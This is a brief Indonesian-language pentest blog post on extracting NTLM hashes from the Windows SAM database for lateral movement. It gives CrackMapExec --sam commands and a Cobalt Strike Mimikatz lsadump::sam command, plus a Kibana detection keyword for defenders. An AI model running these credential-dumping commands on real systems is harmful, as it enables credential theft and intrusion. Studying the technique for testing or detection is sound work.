[Credential Theft] Security Account Manager

Posted Jul 29, 2023 Updated Jul 29, 2023

By Nairpaa 1 min read

Security Account Manager (SAM) adalah database di sistem operasi Windows yang menyimpan pengguna lokal dan kredensial terkait.

Hash NTLM dari akun lokal ini dapat diekstraksi dengan modul Mimikatz lsadump::sam. Jika kredensial administrator lokal digunakan pada seluruh lingkungan, ini dapat membuat lateral movement menjadi sangat mudah.

0x1 - Exploitation Stages

Perintah ini memerlukan hak akses yang lebih tinggi.

A. CrackMapExec

  
➜ crackmapexec smb <IP> -u <User> -p <Password> --sam
➜ crackmapexec smb <IP> -u <User> -p <Password> --sam --local-auth

B. Beacon + Mimikatz

  
beacon> mimikatz !lsadump::sam

OPSEC
Modul Mimikatz ini akan membuka handle ke SAM registry hive.
Kita bisa menggunakan kata kunci “Suspicious SAM Hive Handle” pada Kibana untuk melihat log ini.

0x2 - References

https://adsecurity.org/?page_id=1821
https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz
https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/credential-dumping/security-account-manager-sam

Active Directory, Post Compromise Attack

This post is licensed under CC BY 4.0 by the author.

0x1 - Exploitation Stages

A. CrackMapExec

B. Beacon + Mimikatz

0x2 - References

Trending Tags